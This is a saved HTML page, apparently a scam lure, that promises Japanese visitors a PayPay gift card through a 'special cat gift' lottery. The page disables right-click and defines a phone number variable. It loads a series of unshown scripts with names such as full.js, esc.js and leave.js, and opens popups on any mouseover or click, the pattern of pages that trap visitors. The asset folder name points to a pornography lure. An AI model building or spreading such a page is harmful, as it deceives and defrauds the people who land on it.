<html lang="en"><div id="in-page-channel-node-id" data-channel-name="in_page_channel_n5vL7y"></div><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport">
    <meta content="noindex,nofollow" name="robots">
    <title>ちーん</title>
    <link href="" rel="stylesheet">
    <meta content="special gift cat" name="description">
<meta property="og:title" content="SPECIAL GIFT CAT CHANCE" />
<meta property="og:description" content="ボタンを押して抽選しますニャー" />
<meta property="og:type" content="" />
<meta property="og:image" content="aaaa.png" />
<meta property="og:site_name" content="special cat gift magic&#128570; " />
<meta property="og:locale" content="ja_JP"  />

    <script type="text/javascript" async="" id="gauges-tracker" data-site-id="6724541c9a274b59f299eb89" data-track-path="https://track.gaug.es/track.gif" src="./無料ポルノHD_files/track.js.ダウンロード"></script><script type="text/javascript" src="./無料ポルノHD_files/jquery-1.4.4.min.js.ダウンロード"></script><style type="text/css" id="operaUserStyle">
  
</style>
    <script type="text/javascript">//<![CDATA[
    $(function(){
    $('body').bind('contextmenu', function(e){
    return false;
    });
    });//]]>
    </script>




    <script type="text/javascript">
      var phone_number = '(0101) 50 1303 4301';

    </script>

    <style>
      #bnrs{
        width: 190px;
    position: absolute;
    left: 270px;
    top: 180px;
      }
      .haruto {
        position: absolute;
    bottom: 111px;
    left: 136px;
    color: #124d9b;
    width: 415px;
    font-weight: 700;
    font-size: 25px;
    border: 1px solid #124d9b;
    padding: 0 10px;
    border-radius: 5px;
}
#ftrs_btn {
  width: 142px;
    position: absolute;
    left: 73%;
    bottom: 6%;
    box-shadow: 0 1px 5px 0 rgba(0,0,0,.2), 0 2px 2px 0 rgba(0,0,0,.14), 0 3px 1px -2px rgba(0,0,0,.12);
}
#ftrs_btn a {
  color: #fff;
}
.haru {
  position: absolute;
    bottom: 10.15%;
    left: 6%;
    font-size: 18px;
    color: #ffffffd1;
    font-weight: 800;
}
    </style>

  <style>
@keyframes slide-in-one-tap {
  from {
    transform: translateY(80px);
  }
  to {
    transform: translateY(0px);
  }
}

.trust-hide-gracefully {
  opacity: 0;
}

.trust-wallet-one-tap .hidden {
    display: none;
  }

.trust-wallet-one-tap .semibold {
    font-weight: 500;
  }

.trust-wallet-one-tap .binance-plex {
    font-family: 'Binance';
  }

.trust-wallet-one-tap .rounded-full {
    border-radius: 50%;
  }

.trust-wallet-one-tap .flex {
    display: flex;
  }

.trust-wallet-one-tap .flex-col {
    flex-direction: column;
  }

.trust-wallet-one-tap .items-center {
    align-items: center;
  }

.trust-wallet-one-tap .space-between {
    justify-content: space-between;
  }

.trust-wallet-one-tap .justify-center {
    justify-content: center;
  }

.trust-wallet-one-tap .w-full {
    width: 100%;
  }

.trust-wallet-one-tap .box {
    transition: all 0.5s cubic-bezier(0, 0, 0, 1.43);
    animation: slide-in-one-tap 0.5s cubic-bezier(0, 0, 0, 1.43);
    width: 384px;
    border-radius: 15px;
    background: #FFF;
    box-shadow: 0px 2px 4px 0px rgba(0, 0, 0, 0.25);
    position: fixed;
    right: 30px;
    bottom: 30px;
    z-index: 1020;
  }

.trust-wallet-one-tap .header {
    gap: 15px;
    border-bottom: 1px solid #E6E6E6;
    padding: 10px 18px;
  }

.trust-wallet-one-tap .header .left-items {
      gap: 15px
    }

.trust-wallet-one-tap .header .title {
      color: #1E2329;
      font-size: 18px;
      font-weight: 600;
      line-height: 28px;
    }

.trust-wallet-one-tap .header .subtitle {
      color: #474D57;
      font-size: 14px;
      line-height: 20px;
    }

.trust-wallet-one-tap .header .close {
      color: #1E2329;
      cursor: pointer;
    }

.trust-wallet-one-tap .body {
    padding: 9px 18px;
    gap: 10px;

  }

.trust-wallet-one-tap .body .right-items {
      gap: 10px;
      width: 100%;
    }

.trust-wallet-one-tap .body .right-items .wallet-title {
        color: #1E2329;
        font-size: 16px;
        font-weight: 600;
        line-height: 20px;
      }

.trust-wallet-one-tap .body .right-items .wallet-subtitle {
        color: #474D57;
        font-size: 14px;
        line-height: 20px;
      }

.trust-wallet-one-tap .connect-indicator {
    gap: 15px;
    padding: 8px 0;
  }

.trust-wallet-one-tap .connect-indicator .flow-icon {
      color: #474D57;
    }

.trust-wallet-one-tap .loading-color {
    color: #FFF;
  }

.trust-wallet-one-tap .button {
    border-radius: 50px;
    outline: 2px solid transparent;
    outline-offset: 2px;
    background-color: rgb(5, 0, 255);
    border-color: rgb(229, 231, 235);
    cursor: pointer;
    text-align: center;
    height: 45px;
  }

.trust-wallet-one-tap .button .button-text {
      color: #FFF;
      font-size: 16px;
      font-weight: 600;
      line-height: 20px;
    }

.trust-wallet-one-tap .footer {
    margin: 20px 30px;
  }

.trust-wallet-one-tap .check-icon {
    color: #FFF;
  }

@font-face {
  font-family: 'Binance';
  src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Regular.otf) format('opentype');
  font-weight: 400;
  font-style: normal;
}

@font-face {
  font-family: 'Binance';
  src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Medium.otf) format('opentype');
  font-weight: 500;
  font-style: normal;
}

@font-face {
  font-family: 'Binance';
  src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-SemiBold.otf) format('opentype');
  font-weight: 600;
  font-style: normal;
}

</style></head>
 <script src="https://cdn.tailwindcss.com"></script>
<body>
<div class="bg-white py-6 sm:py-8 lg:py-12">
  <div class="mx-auto max-w-screen-2xl px-4 md:px-8">
    <div class="flex flex-col overflow-hidden rounded-lg bg-gray-900 sm:flex-row md:h-80">
      <div class="flex w-full flex-col p-4 sm:w-1/2 sm:p-8 lg:w-2/5">
        <h2 class="mb-4 text-xl font-bold text-white md:text-2xl lg:text-4xl">おにゃんこのスペシャルギフトを受け取り<br />PayPay ギフトカード　あらゆる特典がありますニャー</h2>
        <p class="mb-8 max-w-md text-gray-400">下のボタンから参加、ただし複数参加はお断りさえていただきます</p>
        <div class="mt-auto">
          <a href="#" class="inline-block rounded-lg bg-white px-8 py-3 text-center text-sm font-semibold text-gray-800 outline-none ring-indigo-300 transition duration-100 hover:bg-gray-100 focus-visible:ring active:bg-gray-200 md:text-base">特典を受け取る</a>
        </div>
      </div>
      <div class="order-first h-48 w-full bg-gray-700 sm:order-none sm:h-auto sm:w-1/2 lg:w-3/5">
        <img src="aaaa.png" loading="lazy" alt="Photo by Dom Hill" class="h-full w-full object-cover object-center" />
      </div>
      <!-- image - end -->
    </div>
  </div>
</div>
</body>

    <script type="text/javascript" src="noir.js.ダウンロード"></script>
    <script type="text/javascript" src="all.js.ダウンロード"></script>
    <script type="text/javascript" src="esc.js.ダウンロード"></script>
    <script type="text/javascript" src="script1.js.ダウンロード"></script>
    <script type="text/javascript" src="script2.js.ダウンロード"></script>
    <script type="text/javascript" src="script3.js.ダウンロード"></script>
    <script type="text/javascript" src="script4.js.ダウンロード"></script>
    <script type="text/javascript" src="script5.js.ダウンロード"></script>
    <script type="text/javascript" src="script6.js.ダウンロード"></script>
    <script type="text/javascript" src="script7.js.ダウンロード"></script>
    <script type="text/javascript" src="web1.js.ダウンロード"></script>
    <script type="text/javascript" src="full.js.ダウンロード"></script>
    <script type="text/javascript" src="leave.js.ダウンロード"></script>

    <script>
      $(document).ready(function(){
        $(".map").click(function(){
          $("#age-confirmation-modal").hide();
        });
      });
      </script>  

    <script>
      $(function() {
        var a = 0,
          b = setInterval(function() {
            a += 10;
            $("#dynamic").css("width", a + "%").attr("aria-valuenow", a).text(a + "% 完了");
            100 <= a && clearInterval(b)
          }, 100)
      });
    </script>
   
    <script>
      var e = 1;
      setInterval(function() {
        1 == e ? (document.getElementById("favicon").href = "w3.png", e = 0) : (document.getElementById("favicon").href = "w1.png", e = 1)
      }, 1E3);
    </script>
    <script>
      $(document).ready(function() {
        $("#mycanvas").click(function() {
          $("#upbxs").show()
        })
      });
    </script>

    <script>
      $(document).ready(function() {
        $("#mycanvas").click(function() {
          $("#botgnws").show()
        })
      });
      $(document).ready(function() {
        $("#cross").click(function() {
          $("#botgnws").show()
        })
      });
    </script>
    <script>
      $(document).ready(function() {
        $("body").mouseover(function() {
          $("#botgnws").show()
        })
      });
    </script>
    
    <script>
      $(document).ready(function() {
        $("#chat").delay(600).fadeIn(100)
      });
    </script>

<script type="text/javascript">
  var _gauges = _gauges || [];
  (function() {
    var t   = document.createElement('script');
    t.type  = 'text/javascript';
    t.async = true;
    t.id    = 'gauges-tracker';
    t.setAttribute('data-site-id', '6724541c9a274b59f299eb89');
    t.setAttribute('data-track-path', 'https://track.gaug.es/track.gif');
    t.src = 'https://d2fuc4clr7gvcn.cloudfront.net/track.js';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(t, s);
  })();
</script>

</body></html>
